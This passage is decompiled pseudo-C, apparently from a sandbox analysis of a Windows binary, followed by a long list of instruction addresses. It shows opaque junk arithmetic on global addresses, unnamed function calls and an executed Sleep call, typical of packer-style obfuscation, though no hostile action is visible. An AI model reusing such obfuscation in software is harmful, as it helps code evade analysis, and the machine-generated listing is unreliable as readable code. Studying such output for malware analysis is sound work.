							_v56 = _t402;
							_t736 = _t736 + _t856 * 2 + 0x3b;
							__eflags = _t736;
							_v12 = _t736;
						}
						_t403 = _v28;
					} else {
						_t872 = _t855 + 5 + _t659;
						_v48 = _t872;
						_t600 = ((_t855 & 0x000000ff) * (_t402 & 0x000000ff) & 0x000000ff) * 0x1d;
						_v28 = _t600;
						_t403 = _v28;
						_t736 = _v16 - (_t600 & 0x000000ff) * 0x3d - _t872;
						_v56 = _t403;
						_t856 = _t659;
						_v12 = _t736;
						_v16 = _t856;
					}
					if(_v52 < 1) {
						break;
					}
					_t817 = 0x3b + _v48 * 2 + _t856;
					_v56 = _t817;
					 *0x6e2c5a04 = _v12 + 5 + _t817;
					E6E1FF5C7();
					_t583 =  *0x6e2c5a04; // -84
					_t866 = _v12;
					_t904 =  *0x6e2c59f2; // 0x4a48
					_v2 = _t583;
					_t584 = _t583 & 0x000000ff;
					if(_t866 >= _t584) {
						_t819 = _v56;
						_t904 = _t904 - _t819;
						 *0x6e2c59f2 = _t904;
						_t866 = _t866 - _t584 * 0x3d - _t819;
						_v2 = _t866 - _v2 + _t819;
					}
					_t818 = _v16;
					_t881 =  *0x6e2c5a00; // 0x0
					_v24 = _t881;
					_v48 = 0x3b + _v56 * 2 + _t818;
					_t851 = _v48 + 0x3b + (_v2 & 0x000000ff) + _t866;
					_v52 = _v52 - 1;
					_v16 = _t851;
					_t593 = _t851 - _t818 - 0x00000054 & 0x0000ffff;
					_v20 = _t593;
					_v8 = _t593;
				}
				_v52 = _t659;
				_t660 = _v12;
				__eflags = _t660 - (_t403 & 0x000000ff);
				if(_t660 < (_t403 & 0x000000ff)) {
					_t661 = _v48;
					_t405 = _v12;
				} else {
					_t661 = _v48;
					_t736 = _t660 - (_v56 & 0x000000ff) * 0x3d - _t661;
					 *0x6e2c59f2 = _t905 - _t661;
					_t405 = _t736;
				}
				_v1 = _t405;
				_v1 = _v1 - _t661;
				_v1 = _v1 - 0x54;
				_v2 = _v1;
				_t858 = _v16;
				__eflags = _t405 - _t661;
				if(_t405 <= _t661) {
					_t406 = _v2;
				} else {
					_t813 = _t736 + 5 + _t661;
					_t923 = 0xffffffac;
					_v1 = _t813;
					_t661 = _t661 + _t923 - _t858;
					_t406 = _t813;
					_v2 = _t406;
					__eflags =  *0x6e2c5a04 - 0x1b47; // 0xac
					if(__eflags == 0) {
						_t881 = _t881 + ( *0x6e2c59e6 & 0x0000ffff);
						_v1 = _t813;
						_t406 = _t813;
						_v24 = _t881;
						_v2 = _t406;
					}
				}
				_t737 = 6;
				__eflags =  *0x6e2c5a02 - _t737; // 0x0
				_t738 = _t881;
				if(__eflags == 0) {
					_t906 = _v52;
					_t661 = _t858 + 0x11dde + _t738;
					__eflags = _t661;
					_v2 = _t406;
				} else {
					_t906 = _t858 - _t661 * 0x3d - _t881;
					 *0x6e2c5a90 = _t906;
					_t858 = _t906;
				}
				_t665 =  ~_t858 - _t661 * 0x3c;
				_v12 = _t665;
				__eflags = ".?AV_System_error_category@std@@" - 0x1b47; // 0x56413f2e
				if(__eflags != 0) {
					L73:
					goto L74;
				} else {
					__eflags = "_System_error_category@std@@";
					if("_System_error_category@std@@" != 0) {
						goto L73;
					}
					_t569 =  *0x6e2c5a28; // -21
					_t570 = _t569 + _v1;
					_v2 = _t570;
					_t665 = _t665 + (_t570 & 0x000000ff) * 2 + 0x3b;
					_v12 = _t665;
					L74:
					_t410 = _v2;
					_t883 = _t410 & 0x000000ff;
					_t666 = _t665 + (_t410 & 0x000000ff) + 2;
					__eflags = ( *0x6e2c59f2 & 0x0000ffff) - _t666;
					if(( *0x6e2c59f2 & 0x0000ffff) <= _t666) {
						_t567 = _v8;
						 *0x6e2c59e0 = _t567;
						_t906 = (_t567 & 0x0000ffff) * 0x36 + _t666;
						__eflags = _t906;
						 *0x6e2c5a90 = _t906;
						_t858 = _t906;
					}
					_t414 = 6;
					__eflags =  *0x6e2c5a98 - _t414; // 0x6e26e664
					if(__eflags != 0) {
						L79:
						_t415 = _v12;
						goto L80;
					} else {
						__eflags =  *0x6e2c5a9c;
						if( *0x6e2c5a9c != 0) {
							goto L79;
						}
						_t415 = _t883 + 0x11dde + _t666;
						_v12 = _t415;
						L80:
						_t669 = _t666 - 0x6e2dc204 + 0xdc5379c0;
						_t740 = _t738 + 5 + _t415;
						__eflags = _t740;
						_v16 = _t740;
						 *0x6e2c5a04 = _t740;
						while(1) {
							_t884 = _t906 & 0x0000ffff;
							_v56 = _t884;
							_t885 = _t669 - _v20 + _t884 & 0x0000ffff;
							_t419 = 6;
							_v8 = _t885;
							__eflags =  *0x6e2c5a02 - _t419; // 0x0
							if(__eflags == 0) {
								_t885 = _v8;
								_t669 = _v12 + 0x11dde + (_t740 & 0x000000ff);
								__eflags = _t669;
							} else {
								_v16 = _v16 +  ~_v12 - (_t669 & 0x000000ff) * 0x3d;
								_t740 = _v16;
								 *0x6e2c5a04 = _t740;
							}
							_v2 = _v12;
							__eflags = _t669 - 0xffb1;
							if(_t669 > 0xffb1) {
								_v8 = _t669 - _t885 + _v56 & 0x0000ffff;
								_t560 = 6;
								__eflags =  *0x6e2c5a02 - _t560; // 0x0
								if(__eflags == 0) {
									_t669 = _v12 + 0x11dde + (_t740 & 0x000000ff);
									__eflags = _t669;
								} else {
									_v16 = _v16 +  ~_v2 - (_t669 & 0x000000ff) * 0x3d;
									_t740 = _v16;
									 *0x6e2c5a04 = _t740;
								}
							}
							__eflags = _v32 - 0x4c;
							if(_v32 < 0x4c) {
								_t892 =  *0x6e2c59f2; // 0x4a48
								_t698 = (_v8 & 0x0000ffff) * 0x36 + _t858;
								__eflags = ( *0x6e2c59e6 & 0x0000ffff) + (_t892 & 0x0000ffff) - 0x32;
								_t772 = _v16;
								_t544 = _t772 & 0x000000ff;
								if(( *0x6e2c59e6 & 0x0000ffff) + (_t892 & 0x0000ffff) != 0x32) {
									_t740 = ((_v32 & 0x000000ff) * _t544 & 0x000000ff) * 0x1d;
									_t547 = (_t740 & 0x000000ff) * 0x37;
									__eflags = _t547;
									_v12 = _t547;
								} else {
									_t740 = _v32 - ((_t772 & 0x000000ff) * _t544 & 0x000000ff) * 0x1d + _v2;
								}
								_v16 = _t740;
								 *0x6e2c5a04 = _t740;
								_t551 = _t698 - _v56 - 0x00000054 & 0x0000ffff;
								_v8 = _t551;
								_t669 = _t698 - (_t551 & 0x0000ffff) * 0x3d - _t858;
								__eflags = _t669;
							}
							_t886 =  *0x6e2c59f2; // 0x4a48
							_v52 = _v8 & 0x0000ffff;
							_v56 =  *0x6e2c59e6 & 0x0000ffff;
							__eflags = (_t886 & 0x0000ffff) + _v56 - 0x32;
							if((_t886 & 0x0000ffff) + _v56 != 0x32) {
								_t428 = _t858 * _v24 * 0x10e1d;
								__eflags = _t428;
							} else {
								_t428 = _t669 - _v24 * _v24 * 0x10e1d + _t858;
							}
							__eflags = _v36;
							_v24 = _t428;
							 *0x6e2c5a00 = _t428;
							_t672 = _v52 & 0x0000ffff;
							if(_v36 <= 0) {
								break;
							}
							_t680 = _t672 + 0x11dde + _t858;
							__eflags = _t680 - (_t740 & 0x000000ff);
							if(_t680 >= (_t740 & 0x000000ff)) {
								 *0x6e2c59f2 = _t886 - _v12;
								_t695 = _t680 - (_t740 & 0x000000ff) * 0x3e;
								__eflags = _t695;
								_t740 = _t695;
								_v16 = _t740;
								 *0x6e2c5a04 = _t740;
							}
							_t681 = _v64;
							__eflags = _t681 - 7;
							if(_t681 < 7) {
								_t694 = _t681 - 1;
								_v64 = _t694;
								_t535 = _v24 + 5 + _t694;
								__eflags = _t535;
								_v8 = _t535 & 0x0000ffff;
							}
							_t684 = (_v8 & 0x0000ffff) + 0x11dde + _t858;
							_t450 = 6;
							 *0x6e2c59d0 = _t684;
							__eflags =  *0x6e2c5a02 - _t450; // 0x0
							if(__eflags == 0) {
								_t754 = _v12;
								_t669 = _t754 + 0x11dde + (_t740 & 0x000000ff);
								__eflags = _t669;
								 *0x6e2c59d0 = _t669;
							} else {
								_t532 = _v16 +  ~_v12 - (_t684 & 0x000000ff) * 0x3d;
								_t754 = _v12;
								_v16 = _t532;
								 *0x6e2c5a04 = _t532;
							}
							_t888 = _t669;
							__eflags =  *0x6e2c5a04 - 0x1b47; // 0xac
							if(__eflags == 0) {
								_t808 = _t754 + _v56;
								__eflags = _t808;
								_v12 = _t808;
								_t669 = _t888 + 0x3b + _t808 * 2;
								 *0x6e2c59d0 = _t669;
								_t888 = _t669;
							}
							_t456 = _v40 - _v8 + _v24 & 0x0000ffff;
							_v56 = _t456 & 0x0000ffff;
							__eflags = _t456 - 0x8816;
							_v20 = _t456;
							_t757 = _v12;
							_v8 = _t456;
							if(_t456 <= 0x8816) {
								L114:
								_t457 = _v12;
								goto L115;
							} else {
								_t669 = (_t456 & 0x0000ffff) + 0x11dde + _t858;
								_t888 = _t669;
								 *0x6e2c59d0 = _t669;
								__eflags = _v24 - _t757;
								if(_v24 == _t757) {
									_t522 = E6E1FF7A5();
									_t906 =  *0x6e2c5a90; // 0x9dec7d1b
									_t692 = _t522;
									__eflags =  *0x6e2c5a04 - 0x1b47; // 0xac
									if(__eflags == 0) {
										_t528 = _v12 + ( *0x6e2c59e6 & 0x0000ffff);
										_t919 = _t906 + 0x3b;
										__eflags = _t919;
										_v12 = _t528;
										_t906 = _t919 + _t528 * 2;
										 *0x6e2c5a90 = _t906;
									}
									_t524 =  *0x6e2c5a04; // -84
									_v16 = _t524;
									_t669 = _t692 +  ~_v12 - (_t524 & 0x000000ff) * 0x3d;
									__eflags = _t669;
									_t757 = _v12;
									 *0x6e2c59d0 = _t669;
									_t888 = _t669;
								}
								_t519 = 6;
								_t858 = _t906;
								__eflags =  *0x6e2c5a02 - _t519; // 0x0
								if(__eflags == 0) {
									_t669 = _t757 + 0x11dde + _t858;
									__eflags = _t669;
									 *0x6e2c59d0 = _t669;
									_t888 = _t669;
									goto L114;
								} else {
									_t457 = _v12 +  ~_t858 - _t888 * 0x3d;
									_v12 = _t457;
									L115:
									__eflags = _v36 - 0xb0;
									if(_v36 >= 0xb0) {
										_t863 = _v16;
										_v28 = _v56 & 0x0000ffff;
									} else {
										__eflags = _t888 - _t457;
										if(_t888 >= _t457) {
											 *0x6e2c59f2 =  *0x6e2c59f2 - _t858;
											__eflags =  *0x6e2c59f2;
											 *0x6e2c59d0 = _t888 - _t457 * 0x3d - _t858;
										}
										Sleep(0x71); // executed
										_t513 = _v8 & 0x0000ffff;
										_t669 =  *0x6e2c59d0; // 0x96574ad2
										_t888 = _t669;
										_t863 =  *0x6e2c5a04; // -84
										_t906 =  *0x6e2c5a90; // 0x9dec7d1b
										_v28 = _t513;
										_v12 = _t513 + 2 + _t669;
										_t516 =  *0x6e2c5a00; // 0x0
										_v24 = _t516;
									}
									_t461 = ( *0x6e2c59f2 & 0x0000ffff) + ( *0x6e2c59e6 & 0x0000ffff);
									_t759 = _v28;
									_v56 = _t461;
									__eflags = _t461 - 0x32;
									if(_t461 != 0x32) {
										_t761 = _t759 * _t906 * 0x10e1d;
										_t669 = _t761 * 0x37;
										__eflags = _t669;
										_t888 = _t669;
									} else {
										_t461 = _v56;
										_t761 = _t759 - _t906 * _t906 * 0x10e1d + _t888;
									}
									__eflags = _v40 - 0x10;
									_v28 = _t761;
									if(_v40 >= 0x10) {
										L129:
										_t915 = _v8;
										goto L130;
									} else {
										__eflags = _t461 - 0x32;
										if(_t461 != 0x32) {
											_t500 = _t761 * _v20 * 0x00000e1d & 0x0000ffff;
											_t915 = _t500;
											_v20 = _t500;
											_v8 = _t500;
											_t669 = (_t915 & 0x0000ffff) * 0x37;
											__eflags = _t669;
											_t888 = _t669;
										} else {
											_t798 = _t761 - _v20 * _v20 * 0x00000e1d + _t888 & 0x0000ffff;
											_v20 = _t798;
											_t915 = _t798;
											_v8 = _t798;
										}
										_t793 = _v40 - 1;
										_t502 = 6;
										_v40 = _t793;
										__eflags =  *0x6e2c5a02 - _t502; // 0x0
										if(__eflags == 0) {
											_t505 = (_t915 & 0x0000ffff) + 0x11dde + _t793;
											_v24 = _t505;
											 *0x6e2c5a00 = _t505;
											L130:
											_t462 = 6;
											__eflags =  *0x6e2c5a02 - _t462; // 0x0
											if(__eflags == 0) {
												_t465 = (_t863 & 0x000000ff) + 0x11dde + (_t915 & 0x0000ffff);
												__eflags = _t465;
											} else {
												_v8 = _t915 +  ~(_t863 & 0x000000ff) - _v12 * 0x3d;
												_v20 = _v8;
												_t465 = _v12;
											}
											__eflags = _t888 - _t465;
											if(_t888 >= _t465) {
												_t494 = _v28;
												_t669 = _t888 - _t465 * 0x3d - _t494;
												 *0x6e2c59f2 =  *0x6e2c59f2 - _t494;
												__eflags =  *0x6e2c59f2;
												_t888 = _t669;
											}
											_t906 = _v36 + _v24 + 2;
											 *0x6e2c5a90 = _t906;
											_v16 = _t906;
											E6E1FF5C7();
											__eflags =  *0x6e2c59f2 - _v8; // 0x4a48
											_t858 = _t906;
											_t765 =  <=  ? _t906 & 0x0000ffff :  *0x6e2c59e0 & 0x0000ffff;
											_t470 =  *0x6e2c5a00; // 0x0
											_v36 = _v36 - 1;
											 *0x6e2c59e0 =  <=  ? _t906 & 0x0000ffff :  *0x6e2c59e0 & 0x0000ffff;
											_t766 = _v60;
											_v24 = _t470;
											_v56 = _t470 + _t766;
											__eflags = _t766 - 2;
											if(_t766 >= 2) {
												_t740 =  *0x6e2c5a04; // -84
												_t472 = _t740 & 0x000000ff;
												_v16 = _t740;
												__eflags = _t888 - _t472;
												if(_t888 < _t472) {
													goto L144;
												}
												_t477 = _v40;
												 *0x6e2c59f2 =  *0x6e2c59f2 - _t477;
												_t669 = _t888 - _t472 * 0x3d - _t477;
												_t479 = _t477 - _t740 + _t669;
												__eflags = _t479;
												_t740 = _t479;
												 *0x6e2c5a04 = _t740;
												goto L143;
											} else {
												__eflags = ( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) - 0x32;
												if(( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) != 0x32) {
													_t785 = _t858 * _v20 * 0x00000e1d & 0x0000ffff;
													_v8 = _t785;
													_t669 = (_t785 & 0x0000ffff) * 0x37;
													__eflags = _t669;
												} else {
													_t785 = _t858 - _v20 * _v20 * 0x00000e1d + _t888 & 0x0000ffff;
												}
												_t486 = _v60 - 1;
												_v60 = _t486;
												_t740 =  *0x6e2c5a04; // -84
												_v20 = _t486 * _t785 * 0x00000e1d & 0x0000ffff;
												L143:
												_v16 = _t740;
												L144:
												_v12 = (_v56 + 5) * 0x654ae;
												continue;
											}
										} else {
											_t508 = _v20 +  ~_t793 - _v24 * 0x3d;
											__eflags = _t508;
											_v20 = _t508;
											_v8 = _t508;
											goto L129;
										}
									}
								}
							}
						}
						_t908 = _t672 + 0x11dde + _t858;
						_t674 = _t672 - _v68 - 0x54;
						_v64 = _t674;
						__eflags = ( *0x6e2c59e6 & 0x0000ffff) + (_t886 & 0x0000ffff) - 0x32;
						_t743 = _v16;
						_t431 = _t743 & 0x000000ff;
						if(( *0x6e2c59e6 & 0x0000ffff) + (_t886 & 0x0000ffff) != 0x32) {
							_t675 = ((_t674 & 0x000000ff) * _t431 & 0x000000ff) * 0x1d;
							_t858 = (_t675 & 0x000000ff) * 0x37;
							__eflags = _t858;
							_t434 = _v64;
							 *0x6e2c5a90 = _t858;
						} else {
							_t434 = _v64;
							_t675 = _t858 - ((_t743 & 0x000000ff) * _t431 & 0x000000ff) * 0x1d + _t434;
						}
						 *0x6e2c5a04 = _t675;
						_v8 = _t434 + _v68 + _v8 + 0x3b;
						_t437 = 6;
						__eflags =  *0x6e2c5a02 - _t437; // 0x0
						if(__eflags == 0) {
							_t440 = _t858 - 0x22 + _v8;
							__eflags = _t440;
							 *0x6e2c5a04 = _t440;
						} else {
							_t858 = _t858 - (_t675 & 0x000000ff) * 0x3d - (_v8 & 0x0000ffff);
							 *0x6e2c5a90 = _t858;
						}
						 *0x6e2c59d0 = _t908 - _t858 - 0x54;
						_t441 = E6E1FF218(_t908 - _t858 - 0x54);
						_t748 =  *0x6e2c59d0; // 0x96574ad2
						_t910 = _t748 + 0x0000248e & 0x0000ffff;
						__eflags = ( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) - 0x32;
						if(( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) != 0x32) {
							_t912 = _t910 * _t441 * 0x10e1d;
							__eflags = _t912;
						} else {
							_t912 = _t910 - _t441 * _t441 * 0x10e1d + 0x6b0;
						}
						 *0x6e2c5a90 = _t912;
						return  *0x6e2c5a04 & 0x000000ff;
					}
				}
			}

























































































































































































                          0x6e1ffb4d
                          0x6e1ffb52
                          0x6e1ffb59
                          0x6e1ffb6b
                          0x6e1ffb76
                          0x6e1ffb7d
                          0x6e1ffb8f
                          0x6e1ffb93
                          0x6e1ffb98
                          0x6e1ffb9d
                          0x6e1ffba3
                          0x6e1ffbaa
                          0x6e1ffbb0
                          0x6e1ffbb7
                          0x6e1ffbc0
                          0x6e1ffbc4
                          0x6e1ffbc6
                          0x6e1ffbca
                          0x6e1ffbcc
                          0x00000000
                          0x00000000
                          0x6e1ffbd1
                          0x6e1ffbd4
                          0x6e1ffbde
                          0x6e1ffbe0
                          0x6e1ffbe8
                          0x00000000
                          0x00000000
                          0x6e1ffbea
                          0x6e1ffbea
                          0x6e1ffbed
                          0x6e1ffc03
                          0x6e1ffc09
                          0x6e1ffc0d
                          0x6e1ffc17
                          0x6e1ffc1e
                          0x6e1ffc20
                          0x6e1ffc25
                          0x6e1ffc2f
                          0x6e1ffc34
                          0x6e1ffc38
                          0x6e1ffc42
                          0x6e1ffc42
                          0x6e1ffc49
                          0x6e1ffc4e
                          0x6e1ffc5c
                          0x6e1ffc69
                          0x6e1ffc77
                          0x6e1ffc7e
                          0x6e1ffc9f
                          0x6e1ffca5
                          0x6e1ffca5
                          0x6e1ffc80
                          0x6e1ffc80
                          0x6e1ffc92
                          0x6e1ffc92
                          0x6e1ffca8
                          0x6e1ffcb0
                          0x6e1ffcb5
                          0x6e1ffcbb
                          0x6e1ffcc2
                          0x6e1ffcc6
                          0x6e1ffccd
                          0x6e1ffcd0
                          0x6e1ffcd4
                          0x6e1ffce0
                          0x6e1ffce7
                          0x6e1ffceb
                          0x6e1ffcf5
                          0x6e1ffcf5
                          0x6e1ffcfd
                          0x6e1ffd01
                          0x6e1ffd15
                          0x6e1ffd1a
                          0x6e1ffd1f
                          0x6e1ffd26
                          0x6e1ffd2a
                          0x6e1ffd33
                          0x6e1ffd37
                          0x6e1ffd39
                          0x00000000
                          0x00000000
                          0x6e1ffd3e
                          0x6e1ffd41
                          0x6e1ffd4b
                          0x6e1ffd4f
                          0x00000000
                          0x00000000
                          0x6e1ffd51
                          0x6e1ffd51
                          0x6e1ffd54
                          0x6e1ffd61
                          0x6e1ffd67
                          0x6e1ffd6b
                          0x6e1ffd75
                          0x6e1ffd78
                          0x6e1ffd79
                          0x6e1ffd80
                          0x6e1ffd9d
                          0x6e1ffda3
                          0x6e1ffda3
                          0x6e1ffda5
                          0x6e1ffda9
                          0x6e1ffd82
                          0x6e1ffd82
                          0x6e1ffd8d
                          0x6e1ffd95
                          0x6e1ffd95
                          0x6e1ffdb1
                          0x6e1ffdbf
                          0x6e1ffdc2
                          0x6e1ffdc6
                          0x6e1ffdcd
                          0x6e1ffdd1
                          0x6e1ffdd6
                          0x6e1ffdde
                          0x6e1ffde6
                          0x6e1ffdeb
                          0x6e1ffdee
                          0x6e1ffdf6
                          0x6e1ffdf8
                          0x6e1ffe09
                          0x6e1ffe0b
                          0x6e1ffe0f
                          0x6e1ffe17
                          0x6e1ffe1c
                          0x6e1ffe23
                          0x6e1ffe23
                          0x6e1ffe25
                          0x6e1ffe2b
                          0x6e1ffe33
                          0x6e1ffe35
                          0x6e1ffe3a
                          0x6e1ffe3f
                          0x6e1ffe48
                          0x6e1ffe4a
                          0x6e1ffe4d
                          0x6e1ffe50
                          0x6e1ffe52
                          0x6e1ffe57
                          0x6e1ffe57
                          0x6e1ffe59
                          0x6e1ffe5c
                          0x6e1ffe64
                          0x6e1ffe69
                          0x6e1ffe70
                          0x6e1ffe79
                          0x6e1ffe81
                          0x6e1ffe8c
                          0x6e1ffe8c
                          0x6e1ffe90
                          0x6e1ffe9d
                          0x6e1ffe9f
                          0x6e1ffea6
                          0x6e1ffec2
                          0x6e1ffec8
                          0x6e1ffec8
                          0x6e1ffea8
                          0x6e1ffeb5
                          0x6e1ffeb9
                          0x6e1ffeb9
                          0x6e1ffed2
                          0x6e1ffedd
                          0x6e1ffee1
                          0x6e1ffee4
                          0x6e1fff0a
                          0x6e1fff13
                          0x6e1fff13
                          0x6e1fff16
                          0x6e1ffee6
                          0x6e1ffeff
                          0x6e1fff03
                          0x6e1fff03
                          0x6e1fff1a
                          0x6e1fff1d
                          0x6e1fff24
                          0x6e1fff28
                          0x6e1fff2a
                          0x00000000
                          0x00000000
                          0x6e1fff33
                          0x6e1fff39
                          0x6e1fff3c
                          0x6e1fff40
                          0x00000000
                          0x00000000
                          0x6e1fff42
                          0x6e1fff46
                          0x6e1fff46
                          0x6e1fff4b
                          0x6e1fff5a
                          0x6e1fff5e
                          0x6e1fff87
                          0x6e1fff87
                          0x6e1fff60
                          0x6e1fff79
                          0x6e1fff79
                          0x6e1fff8d
                          0x6e1fff91
                          0x6e1fff9a
                          0x6e1fffa0
                          0x6e1fffa4
                          0x6e1fffa7
                          0x6e1fffb5
                          0x6e1fffdd
                          0x6e1fffe6
                          0x6e1fffe6
                          0x6e1fffb7
                          0x6e1fffd1
                          0x6e1fffd1
                          0x6e1ffff0
                          0x6e1ffffb
                          0x6e1ffffd
                          0x6e200004
                          0x6e200006
                          0x6e200014
                          0x6e200014
                          0x6e20001d
                          0x6e200026
                          0x6e200035
                          0x6e200044
                          0x6e20004f
                          0x6e200053
                          0x6e200057
                          0x6e200058
                          0x6e20005f
                          0x6e200063
                          0x6e200071
                          0x6e200074
                          0x6e200078
                          0x6e20007a
                          0x6e20007a
                          0x6e200063
                          0x6e200085
                          0x6e200091
                          0x6e200095
                          0x6e200095
                          0x6e20009b
                          0x6e20009e
                          0x6e2000a9
                          0x6e2000b0
                          0x6e2000b4
                          0x6e2000b7
                          0x6e2000bd
                          0x6e200102
                          0x6e200106
                          0x6e20010d
                          0x6e20010f
                          0x6e200113
                          0x6e200117
                          0x6e20011b
                          0x6e200121
                          0x6e200123
                          0x6e200127
                          0x6e200129
                          0x6e20012d
                          0x6e200133
                          0x6e20013a
                          0x6e20013a
                          0x6e20013d
                          0x6e20013d
                          0x6e200141
                          0x6e2000bf
                          0x6e2000cb
                          0x6e2000cd
                          0x6e2000d8
                          0x6e2000db
                          0x6e2000e7
                          0x6e2000eb
                          0x6e2000ed
                          0x6e2000f1
                          0x6e2000f3
                          0x6e2000f7
                          0x6e2000f7
                          0x6e20014a
                          0x00000000
                          0x00000000
                          0x6e20015f
                          0x6e200165
                          0x6e200169
                          0x6e20016e
                          0x6e200173
                          0x6e200178
                          0x6e20017c
                          0x6e200183
                          0x6e200187
                          0x6e20018c
                          0x6e20018e
                          0x6e200192
                          0x6e200198
                          0x6e2001a1
                          0x6e2001ab
                          0x6e2001ab
                          0x6e2001b3
                          0x6e2001b7
                          0x6e2001bd
                          0x6e2001ca
                          0x6e2001dc
                          0x6e2001de
                          0x6e2001e4
                          0x6e2001ed
                          0x6e2001f0
                          0x6e2001f4
                          0x6e2001f4
                          0x6e2001fd
                          0x6e200201
                          0x6e200208
                          0x6e20020a
                          0x6e20022e
                          0x6e200232
                          0x6e20020c
                          0x6e200212
                          0x6e20021e
                          0x6e200223
                          0x6e20022a
                          0x6e20022a
                          0x6e200236
                          0x6e20023a
                          0x6e20023e
                          0x6e200247
                          0x6e20024b
                          0x6e20024f
                          0x6e200251
                          0x6e200290
                          0x6e200253
                          0x6e200258
                          0x6e20025a
                          0x6e20025d
                          0x6e200261
                          0x6e200263
                          0x6e20026a
                          0x6e20026e
                          0x6e200275
                          0x6e20027e
                          0x6e200280
                          0x6e200284
                          0x6e200286
                          0x6e20028a
                          0x6e20028a
                          0x6e200275
                          0x6e200296
                          0x6e200297
                          0x6e20029e
                          0x6e2002a0
                          0x6e2002b5
                          0x6e2002bf
                          0x6e2002bf
                          0x6e2002c1
                          0x6e2002a2
                          0x6e2002a9
                          0x6e2002ab
                          0x6e2002b1
                          0x6e2002b1
                          0x6e2002cc
                          0x6e2002d3
                          0x6e2002d7
                          0x6e2002dd
                          0x6e200308
                          0x00000000
                          0x6e2002df
                          0x6e2002df
                          0x6e2002e6
                          0x00000000
                          0x00000000
                          0x6e2002e8
                          0x6e2002ed
                          0x6e2002f1
                          0x6e2002ff
                          0x6e200302
                          0x6e20030c
                          0x6e20030c
                          0x6e200310
                          0x6e200319
                          0x6e200322
                          0x6e200324
                          0x6e200326
                          0x6e20032b
                          0x6e200337
                          0x6e200337
                          0x6e200339
                          0x6e20033f
                          0x6e20033f
                          0x6e200343
                          0x6e200344
                          0x6e20034a
                          0x6e200363
                          0x6e200363
                          0x00000000
                          0x6e20034c
                          0x6e20034c
                          0x6e200353
                          0x00000000
                          0x00000000
                          0x6e20035b
                          0x6e20035d
                          0x6e200367
                          0x6e200376
                          0x6e20037c
                          0x6e20037c
                          0x6e20037e
                          0x6e200382
                          0x6e200388
                          0x6e200388
                          0x6e200393
                          0x6e200397
                          0x6e20039c
                          0x6e20039d
                          0x6e2003a1
                          0x6e2003a8
                          0x6e2003cc
                          0x6e2003d9
                          0x6e2003d9
                          0x6e2003aa
                          0x6e2003b8
                          0x6e2003bc
                          0x6e2003c0
                          0x6e2003c0
                          0x6e2003df
                          0x6e2003e3
                          0x6e2003e9
                          0x6e2003f8
                          0x6e2003fc
                          0x6e2003fd
                          0x6e200404
                          0x6e200431
                          0x6e200431
                          0x6e200406
                          0x6e200414
                          0x6e200418
                          0x6e20041c
                          0x6e20041c
                          0x6e200404
                          0x6e200433
                          0x6e200438
                          0x6e20043f
                          0x6e200455
                          0x6e200457
                          0x6e20045a
                          0x6e20045e
                          0x6e200461
                          0x6e200488
                          0x6e20048e
                          0x6e20048e
                          0x6e200491
                          0x6e200463
                          0x6e200475
                          0x6e200475
                          0x6e200497
                          0x6e2004a2
                          0x6e2004a8
                          0x6e2004ab
                          0x6e2004b7
                          0x6e2004b7
                          0x6e2004b7
                          0x6e2004be
                          0x6e2004c5
                          0x6e2004d0
                          0x6e2004db
                          0x6e2004de
                          0x6e2004fb
                          0x6e2004fb
                          0x6e2004e0
                          0x6e2004ef
                          0x6e2004ef
                          0x6e200501
                          0x6e200506
                          0x6e20050a
                          0x6e200513
                          0x6e200516
                          0x00000000
                          0x00000000
                          0x6e200525
                          0x6e200527
                          0x6e200529
                          0x6e200536
                          0x6e20053d
                          0x6e20053d
                          0x6e20053f
                          0x6e200541
                          0x6e200545
                          0x6e200545
                          0x6e20054b
                          0x6e20054f
                          0x6e200552
                          0x6e200558
                          0x6e20055c
                          0x6e200560
                          0x6e200560
                          0x6e200565
                          0x6e200565
                          0x6e200576
                          0x6e200578
                          0x6e200579
                          0x6e20057f
                          0x6e200586
                          0x6e2005ae
                          0x6e2005b8
                          0x6e2005b8
                          0x6e2005ba
                          0x6e200588
                          0x6e20059a
                          0x6e20059c
                          0x6e2005a0
                          0x6e2005a4
                          0x6e2005a4
                          0x6e2005c5
                          0x6e2005c7
                          0x6e2005ce
                          0x6e2005d0
                          0x6e2005d0
                          0x6e2005d7
                          0x6e2005db
                          0x6e2005de
                          0x6e2005e4
                          0x6e2005e4
                          0x6e2005f2
                          0x6e2005f8
                          0x6e200601
                          0x6e200604
                          0x6e200608
                          0x6e20060c
                          0x6e200610
                          0x6e2006c1
                          0x6e2006c1
                          0x00000000
                          0x6e200616
                          0x6e20061f
                          0x6e200621
                          0x6e200623
                          0x6e200629
                          0x6e20062d
                          0x6e200631
                          0x6e200636
                          0x6e20063c
                          0x6e200643
                          0x6e20064a
                          0x6e200657
                          0x6e200659
                          0x6e200659
                          0x6e20065c
                          0x6e200660
                          0x6e200663
                          0x6e200663
                          0x6e200669
                          0x6e200672
                          0x6e200680
                          0x6e200680
                          0x6e200682
                          0x6e200686
                          0x6e20068c
                          0x6e20068c
                          0x6e200690
                          0x6e200691
                          0x6e200693
                          0x6e20069a
                          0x6e2006b7
                          0x6e2006b7
                          0x6e2006b9
                          0x6e2006bf
                          0x00000000
                          0x6e20069c
                          0x6e2006a9
                          0x6e2006ab
                          0x6e2006c5
                          0x6e2006c5
                          0x6e2006cd
                          0x6e200724
                          0x6e20072b
                          0x6e2006cf
                          0x6e2006cf
                          0x6e2006d1
                          0x6e2006da
                          0x6e2006da
                          0x6e2006e1
                          0x6e2006e1
                          0x6e2006e9
                          0x6e2006ef
                          0x6e2006f4
                          0x6e2006fa
                          0x6e2006fc
                          0x6e200702
                          0x6e200708
                          0x6e200711
                          0x6e200715
                          0x6e20071a
                          0x6e20071a
                          0x6e20073d
                          0x6e20073f
                          0x6e200743
                          0x6e200747
                          0x6e20074a
                          0x6e200762
                          0x6e200768
                          0x6e200768
                          0x6e20076b
                          0x6e20074c
                          0x6e200757
                          0x6e20075b
                          0x6e20075b
                          0x6e20076d
                          0x6e200772
                          0x6e200776
                          0x6e2007ed
                          0x6e2007ed
                          0x00000000
                          0x6e200778
                          0x6e200778
                          0x6e20077b
                          0x6e2007ab
                          0x6e2007ae
                          0x6e2007b1
                          0x6e2007b5
                          0x6e2007bc
                          0x6e2007bc
                          0x6e2007bf
                          0x6e20077d
                          0x6e20078e
                          0x6e200791
                          0x6e200795
